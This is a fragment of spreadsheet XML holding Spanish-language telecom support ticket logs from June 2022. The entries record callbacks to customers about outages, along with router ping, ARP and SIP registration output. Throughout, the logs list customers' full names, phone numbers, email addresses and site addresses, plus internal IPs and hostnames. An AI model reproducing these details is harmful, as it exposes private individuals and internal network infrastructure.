GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS
*-*-*</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CAROLINA 34471673 PARA VALIDAR LAS PRUEBAS QUE YA HAN REALIZADO CON LA  EXT PERO NO NOS RESPONDE
##LLAMADA DESDE VIVO
A LA ESPERA QUE NOS RESPONDE CC GT VIA SKYPE</t>
  </si>
  <si>
    <t>F4594040</t>
  </si>
  <si>
    <t>SE HABLÓ CON ILEANA RAMOS/CLIENTE 00 525551745299 INDICA QUE HARÁ SUS PRUEBAS INTERNAS, PIDE SE LE LLAME EN UNA HORA PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.
ASUNTO: RE: SOLICITUD DE SOPORTE ::: CONTR0002277123OC ::: IMSCI002998 ::: PÉRDIDA DE PAQUETES &amp; LATENCIA</t>
  </si>
  <si>
    <t>F4594066</t>
  </si>
  <si>
    <t>*- SE RECIBE CORREO DE CLIENTE, INFORMA QUE SEGUN LO QUE SE VERIFICO EN LA REUNION SI SE CUENTA CON INCONVENIENTE, SOLICITA PRIORIDAD, SE CONFIRMA LO ANTERIOR EN CRONOLOGIA QUE ANTECEDE POR LO QUE NO APLICA ESTADO PR, SE SOLICITA APOYO A CNOC -*
-*</t>
  </si>
  <si>
    <t>SE PROCEDE A VALIDAR CON CLIENTE Y POR LOS CAMBIOS EL CLIENTE SOLICITA MANTENER ABIIERTO EL TTK Y LLAMARLE AL CLIENTE HASTA EL SIGUIENTE LUNES A LAS 10 AM</t>
  </si>
  <si>
    <t>SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE PARA PODER REALIZAR PRUEBAS EN LAS SIGUIENTES HORAS SE TENDRA AVANCES DEL CLIENTE SE ESTA EN CONSTANTE COMUNICACION VIA UN GRUPO AL CUAL SE AGREGO EN WHATSAPP POR PARTE DE JORGE QUIÑONES DE APEX</t>
  </si>
  <si>
    <t>EL CLIENTE SE ENCUENTRA REALIZANDO CAMBIOS LOGICOS EN SU RED PARA PODER REALIZAR MACH EN CONFIGURACIONES Y PODER VALIDAR SERVICIOS OPERATIVOS.</t>
  </si>
  <si>
    <t>F4594071</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VICTOR ALDANA AL 32573659 INDICA QUE AUN NO CUENTA CON SERVICIO || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001948222
**</t>
  </si>
  <si>
    <t>F4594078</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE GABRIEL AGUILAR 37587651 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001946928</t>
  </si>
  <si>
    <t>F4594079</t>
  </si>
  <si>
    <t>SE ENVIA CORREO-.
RE: VALIDACIÓN DE ENLACE CLARO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
VALIDACIÓN DE ENLACE CLARO</t>
  </si>
  <si>
    <t>F4594082</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDWIN MARTINEZ 59051514 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001981041</t>
  </si>
  <si>
    <t>F4594083</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN ESTRADA 47591881 MENCIONA QUUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001966090</t>
  </si>
  <si>
    <t>F4594088</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYDA PERDOMO 9647-4850 NO REPONDE, ENVIA A BUZON
-ID 1001967742</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYDA PERDOMO 9647-4850 PARA BRINDAR RETROALIMENTACION
-ID 2001039473</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAYDA PERDOMO 9647-4850 INDICA QUE YA REINICIO EL EQUIPO PERO NO ENCIENDE SE LE PIDE UN MOMENTO PERO CORTA LLAMADA SE INTENTARA LUEGO **
-ID 1001978781
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYDA PERDOMO 9647-4850 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001955325</t>
  </si>
  <si>
    <t>F4594089</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN MARTINEZ 59051514  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001965217</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDWIN MARTINEZ AL 59051514  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001032542
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN MARTINEZ 59051514 MENCIONA QUE SE ENCUENTRA EN EL HORARIO DE ALMUERZO POR LO QUE SOLICITA LLAMDA PARA LAS 13:30
-ID 2001015854</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDWIN MARTINEZ AL 59051514  NO RESPONDE ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 2001022860
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MARTINEZ AL 59051514   INDICA QUE ESTA MUY INTERMITENTE || SE NOTIFICA A GESTOR **
ID 1001975992
**</t>
  </si>
  <si>
    <t>F4594094</t>
  </si>
  <si>
    <t>CLIENTE JOSE AMILCAR ARVIZU 47694717 VALIDA EL SERVICIO OPERATIVO, FAVOR VALIDAR A LAS 2 PM CON SD. ID: 1001984427</t>
  </si>
  <si>
    <t>F4594100</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LIGIA GARCIA 50161229 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001960039</t>
  </si>
  <si>
    <t>F4594102</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA LOPEZ   AL 56350730   QUIEN INDICA QUE CIERRAN A LAS 16:00 HRS PERO BRINDA LA SIGUIENTE INFORMACION Y SOLICITA QUE SE LE PROGRAME LA VISITA PARA EL DIA DE MAÑANA A LAS 10:00 AM**
HORARIO DE ATENCION: 8:30 AM A 16:00 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: 1ER CALLE 3 AVE. ZONA 2 SANTA ELENA PETEN
ATENDERA EN SITIO: JESSICA LOPEZ
ID 2001072125
**</t>
  </si>
  <si>
    <t>F4594104</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE ALEXANDER MONTANO 70001417 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 1001982670</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER MONTANO  AL 70001417 NO RESPONDE || DA TONO DE PENDIENTE DE INSTALACION || SE INTENTARA LUEGO **
-ID 1001973707
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER MONTANO  AL 70001417 NO RESPONDE || DA TONO DE PENDIENTE DE INSTALACION || SE INTENTARA LUEGO **
-ID 1001955788
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MONTANO EN EL PRIMERO NO RESPONDEN Y EN EL SEGUNTO INDICAN NUMERO EQUIVOCADO
-ID 1001949734 - 1001949847 - 1001950114</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE  PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 11:41
PARA: AMONTANO@MALLCASCADAS.COM &lt;AMONTANO@MALLCASCADAS.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: DESARROLLOS HOTELEROS DE EL SALVADOR, SA || IDG000354 || F4594104
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4594109</t>
  </si>
  <si>
    <t>SE HABLÓ CON GLADYS GUZMÁN/CLIENTE 50389341 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4594111</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GEOVANI COPET-30233144 INDICA QUE APLICO REINICIO NUEVAMENTE A PBX Y SERVICIO RESTABLECIO ##VALIDA##
1001974617
COLA:
NOMBRE: A: 30233144
NÚMERO: 011 50230233144
DURACIÓN: 0:05:48
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50230233144
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 8/06/2022 11:21:31</t>
  </si>
  <si>
    <t>CLEINTE BUSCARA CREDENCIALES ### PIDE SE LE MARQUE EN 1 HORA ##
TEL:+50224115454
     IMPI  =  +50224115454@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50224115454
         SCU NUMBER  =  123
     REGISTER STATE  =  UNREGISTERED
      REGISTER TIME  =  3600
      RESIDUAL TIME  =  3223
1001954913
COLA:
NOMBRE: A: 30233144
NÚMERO: 011 50230233144
DURACIÓN: 0:20:50
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50230233144
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 8/06/2022 10:46:39</t>
  </si>
  <si>
    <t>SE LLAMA GEOVANI COPET-30233144  ### SE TIENE EN LINEA ##
1001954913
COLA:
NOMBRE: A: 30233144
NÚMERO: 011 50230233144
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: +50230233144
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 8/06/2022 10:25:44</t>
  </si>
  <si>
    <t>CLIENTE AUN NO SE REGISTRA- ESTA VEIRIFICANDO SI POSEE CREDENCIALES ##
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50224115454";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-06-08 10:33:56-06:00
O&amp;M    #422837
%%/*1879546019 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50224115454";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50224115454@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50224115454
         SCU NUMBER  =  125
     REGISTER STATE  =  UNREGISTERED
      REGISTER TIME  =  3600
      RESIDUAL TIME  =  2840
        PATH HEADER  =  NULL
    CONTACT ADDRESS  =  NULL
 AUTHORIZATION TYPE  =  MD5
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  NULL
USER PRIORITY LEVEL  =  0
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  NULL
(NUMBER OF RESULTS = 1)</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA ##  CLIENTE HABIA APLICADO RESET A PBX ## CLIENTE ESTA VERIFICANDO CREDENCIALES##
&lt;GMIXGTMVN1T1B03B02EIM4&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO  10.78.87.198
  PING 10.78.87.198: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.78.87.198 PING STATISTICS ---
    545 PACKET(S) TRANSMITTED
    545 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;GMIXGTMVN1T1B03B02EIM4&gt;</t>
  </si>
  <si>
    <t>F4594117</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERVIN LAJUL AL 42665768 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001957610
**</t>
  </si>
  <si>
    <t>F4594122</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEIDY 56996439 - 77674030 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001971311 -  1001971471</t>
  </si>
  <si>
    <t>F4594127</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS VASQUEZ AL 58656674 CONTESTA EL SEÑOR CARLOS COYOY INDICA QUE SE DEJE EN OBSERVACION 30 MIN **
ID 1001967187
**</t>
  </si>
  <si>
    <t>F4594132</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE AGENCIA AL 24354556  CONTESTA LA SEÑORITA BLANCA  VIDAL CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 1001960696
**</t>
  </si>
  <si>
    <t>F4594138</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO PARA INDICAR EL ESTATUS DEL SEVICIO,, ACTUALMENTE DOWN.
&lt;LTECSVYEN2D1EID1&gt;PING -VPN-INSTANCE ISDEMU
&lt;LTECSVYEN2D1EID1&gt;PING -VPN-INSTANCE ISSS 10.130.129.7
  PING 10.130.129.7: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.130.129.7 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;LTECSVYEN2D1EID1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                                			7:45:00 A. M.
1/5	RICARDO DE PAZ	78432633	2 HORAS	9:45:00
2/5	HUMBERTO CHIQUILLO		3 HORAS	10:45:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	11:45:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	12:45:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	14:45:00</t>
  </si>
  <si>
    <t>F4594141</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ELVA CRUZ AL  87398347 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001969826
**</t>
  </si>
  <si>
    <t>F4594146</t>
  </si>
  <si>
    <t>-* SE HABLA CON MINDY COLOP (CLIENTE) INFORMA QUE ESTABA OCUPADA, SE DEJA EN CONFERENCIA CON JHONSER ESCOBAR (GESTOR) PARA VERIFICACIONES Y/ O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MINDY COLOP 52146455 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001987411</t>
  </si>
  <si>
    <t>F4594149</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NATALI CRUZ 23049696 MENCIONA QUE PRESENTAN VARIAS CAIDAS DURANTE LA MAÑANA POR LO QUE SOLICITA SE VALIDE DE NUEVO Y ENVIAR LAS PRUEBAS POR CORREO
SOPORTE@INNOVATELCO.NET
-ID 2001140699</t>
  </si>
  <si>
    <t>F4594158</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL AREVALO 61833048 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001097378</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MIGUEL AREVALO AL 61833048 INDICA QUE YA ENVIO CORREO CONFIRMANDO QUE PARA EL DIA SABADO 11 A LAS 9:30 AM SOLICITA LA CERTIFICACION **
-ID 2001127712
**</t>
  </si>
  <si>
    <t>F4594159</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE MARCOS MAYEN 53042243  ID: 1001989705, ATIENDE: SINDY CRUZ, CLIENRTE COMENTA QUE AUN TIENE PROBLEMAS YA QUE NO PUEDEN NAVEGAR, SE DEJA EN CONFERENCIA CON WAGNER.POLANCO | A ESPERA DE LO QUE SE DETERMINE</t>
  </si>
  <si>
    <t>F4594163</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALMA PERDOMO AL 24131787 CONTESTA PERO CORTA LLAMADA SE LLAMA NUEVAMENTE SE CONTACTA Y SE DEJA EN LINEA CON GESTOR **
ID 2001004381 - 2001006572
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALMA PERDOMO AL 24134592  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001066935
**</t>
  </si>
  <si>
    <t>F4594177</t>
  </si>
  <si>
    <t>SE LLAMA A TELMEX 52 (55) 5174 5299  ID: 2001010904, ATIENDE:  GUADALUPE, CONFIRMA SERVICIO OK, AUTPORIZA CIERRE DE TKT, SE NOTIFICA A GERSON.AJPACAJA VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4594195</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE CHERSI ARAUJO 24329510 -- 59704788 ID: 1001996573
CL INDICA QUE AUN PRESENTA AFECTACION, SE DEJA EN CONFERENCIA CON SAQITZUNUN.COJTI PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>CLIENTE CHELSI DEJA EN ESPERA EN LO QUE UBICA EL EQUIPO AETHRA DE CLARO ID:2001003027</t>
  </si>
  <si>
    <t>SE VALIDA QUE AETHRA DEL CLIENTE YA SE ESTÁ REGISTRANDO, CLIENTE CHELSI 24329510  COMENTA REINICIÓ EQUIPOS NUEVAMENTE. VALIDA QUE YA TIENE LLAMADAS EN AMBOS SENTIDOS, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO
ABRUVA_90001910152\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        75       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        29       30
CURRENT TRUNK SIP CONNECTIONS = 1 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-ABRUVA            ENABLE   +50222269800                     REGISTERED                              10.16.246.231:5060    313       11 SEP 1974 10:31:34
STATUS OF ISDN-PRI-LINE-1</t>
  </si>
  <si>
    <t>CLIENTE CHELSI UBICA Y REINICIA EQUIPO AETHRA 6044 PERO EQUIPO CONTINÚA ALARMADO, TAMBIÉN REINICIA EQUIPO ETX-1. A NIVEL DE CLARO SE OBSERVA QUE AETHRA RESPONDE A NIVEL DE PING, PERO EQUIPO NO SE REGISTRA, SE BOTO REGISTRO EN CENTRAL Y SE FORZÓ EN EL AETHRA PERO INCONVENIENTE PERSISTE, CLIENTE INDICA QUE EL EQUIPO AETHRA TIENE LA LUZ DE PWR EN ROJO. SOLICITA VISITA TÉCNICA PARA EL DÍA DE MAÑANA A LAS 8 AM YA QUE ESTÁ POR RETIRARSE. ID DE LLAMADA: 2001003027
&lt;GNCYGTUTN1C1B08B02EIM3&gt;PING -VPN-INSTANCE IP_PBX_ACCESO 10.78.74.102
  PING 10.78.74.102: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.78.74.102: BYTES=56 SEQUENCE=1 TTL=64 TIME=1 MS
    REPLY FROM 10.78.74.102: BYTES=56 SEQUENCE=2 TTL=64 TIME=1 MS
    REPLY FROM 10.78.74.102: BYTES=56 SEQUENCE=3 TTL=64 TIME=1 MS
    REPLY FROM 10.78.74.102: BYTES=56 SEQUENCE=4 TTL=64 TIME=1 MS
    REPLY FROM 10.78.74.102: BYTES=56 SEQUENCE=5 TTL=64 TIME=1 MS
  --- 10.78.74.102 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;GNCYGTUTN1C1B08B02EIM3&gt;DISP ARP ALL | IN 10.78.74.102
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
----------------------------------------------------------------------------------------
10.78.74.102    00D0-D650-C606  17        D-0         VLANIF3828       IP_PBX_ACCESO
----------------------------------------------------------------------------------------
TOTAL:1085         DYNAMIC:806       STATIC:0    INTERFACE:279    REMOTE:0
REDIRECT:0
&lt;GNCYGTUTN1C1B08B02EIM3&gt;
ABRUVA_90001910152\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-ABRUVA            ENABLE   +50222269800                     FAILED</t>
  </si>
  <si>
    <t>F4594202</t>
  </si>
  <si>
    <t>####CLIENTE INGRID PEREZ INDICA CIERRE DE TICKET###
2001061957
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:47:01
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 8/06/2022 16:23:48</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE INGRID PEREZ AL 41960032 SE BRINDA RETROALIMENTACION A CLIENTE **
-ID 2001029839
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE INGRID PEREZ AL 47409160   NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001009405
**</t>
  </si>
  <si>
    <t>F4594206</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA  AL 70739144 INDICA QUE REINICIO EL EQUIPO Y NO LEVANTO EL SERVICIO || SE NOTIFICA A GESTOR **
-ID 2001012034
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALVARO HERRERA AL 70739113 INDICA QUE NO SE ENCUENTRA EN SITIO Y BRINDA EL NUMERO DE CLAUDIA  70739144 **
ID 2001010379
**</t>
  </si>
  <si>
    <t>F4594215</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO  DE APERTURA
JONATHAN EDUARDO TEZEN MEJIA
BUENA TARDE ESTIMADO CLIENTE ,
SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR APERTURA DE CAJERO  EN CONJUNTO CON NUESTRA ÁREA TÉCNICA PARA SERVICIO, CC_TYT_GT_ATM3414 | F4594215 | (ATM 3414) TORRE EMPRESARIAL - 7 AV. 3-33, ZONA 9 |  SUPLICAMOS LA VISITA SEA GESTIONADA  EL DIA DE MAÑANA 10-06-2022 A LAS 10:00
DATOS:
NOMBRE IBM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QUEDO ATENTO A SU RESPUESTA</t>
  </si>
  <si>
    <t>APERTURA DE CAJERO CC_TYT_GT_ATM3414 | F4594215 | (ATM 3414) TORRE EMPRESARIAL - 7 AV. 3-33, ZONA 9
CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;
@OPERADORES ATM TAVSA SU APOYO POR FAVOR</t>
  </si>
  <si>
    <t>F4594216</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY QUIÑONEZ 58551882 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001051876</t>
  </si>
  <si>
    <t>F4594217</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE MANUEL ORTIZ 25269051 INDICA QUE ELLOS CUENTAN CON 2 E1 Y HOY EN LA MAÑANA EL E1 25269100   LE PRESENTO 5 FALLAS COMENTA QUE SI SE LE PUEDE APOYAR SE LE INFORMA QUE TENDRIA QUE REPORTARLO  CL AGRADECE E INDICA QUE LO REPORTARA Y CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001394136
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MANUEL ORTIZ 25269051 CONTESTA UNA SEÑORITA SOLICITA QUE SE LLAME EN 10 MIN **
ID 2001016400
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269051 PARA VALIDAR EL HORARIO DE LA VISITA
-ID 1001993472
NOMBRE DEL CLIENTE: DEFENSORIA DEL CONSUMIDOR
UBICACIÓN:CALLE CIRCUMBALACION #20 PLAN DE LA LAGUNA ANTIGUO CUSCATLAN
CONTACTO EN SITIO:  MANUEL ORTIZ 25269051
HORARIO DE ATENCION:MAÑANA A LAS 8:30
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MANUEL ORTIZ 25269051 INDICA QUE ESTA REALIZANDO PRUEBAS DE LLAMADAS Y SOLICITA QUE SE LE CONTACTE EL DÍA DE MAÑANA A LAS 10:00 AM</t>
  </si>
  <si>
    <t>F4594223</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESMERALDA VEGA AL 78551760 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001028570
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESMERALDA VEGA AL 78551760 - 77404115 NO RESPONDE ENVIA A BUZON AMBOS NUMEROS  || SE INTENTARA LUEGO **
ID 2001017723 - 2001008188
**</t>
  </si>
  <si>
    <t>F4594226</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO CHIROY 42162533MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 1001977249</t>
  </si>
  <si>
    <t>F4594234</t>
  </si>
  <si>
    <t>SE VERIFICA QUE LA SOLICITUD DE APERTURA DE ESTE INCIDENTE FUE POR MONITOREO, EN CRONO DE SD NO INDICA HORA DE FINALIZACION, SE LLAMA A CENTRAL 25069510 ATIENDE: DAVID MONTALVO, SOLICITA SE DEJE EN MONITOREO HASTA LAS 15:00 HRS  | SE NOTIFICA A LUVY.SANDOVAL VIA SKYPE  PARA EL CAMBIO DE ETAPA</t>
  </si>
  <si>
    <t>SE HABLÓ CON ESDRAS VÁSQUEZ/CLIENTE 25069510 INDICA QUE A LAS 14:58 HORAS TUVO UNA CAÍDA, PIDE SE MANTENGA MONITOREO PARA LAS 19:00 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 25069510 QUIEN SOLICITA MONITOREO PARA LAS 19:00 HRS
-ID 2001053088</t>
  </si>
  <si>
    <t>F4594237</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 25069510 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 2001053088</t>
  </si>
  <si>
    <t>F4594239</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  STANLEY CANDRAY 70700120 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001076976</t>
  </si>
  <si>
    <t>F4594240</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ALEJANDRO AL 32731660  NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001168481
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. SERGIO AL 32731660 CLIENTE INDICA QUE TIENE EL SERVICIO EN MONITOREO PERO AUN OBSERVA LENTITUD || SE NOTIFICA A GESTOR **
ID 2001027310
**</t>
  </si>
  <si>
    <t>F4594245</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA DE CUENTA PARA VALIDAR SERVICIO SIN EMBARGO NO RESPONDE---
58260474</t>
  </si>
  <si>
    <t>SE LLAMA A SILVIA LEIVA 58260474 MENCIONA QUE EL TICKET FUE APERTURADO A SOLICITUD DE CNOOC PORQUE NO LE LLEGAN A LOS EQUIPOS DE UM
-ID 20010055807</t>
  </si>
  <si>
    <t>F4594248</t>
  </si>
  <si>
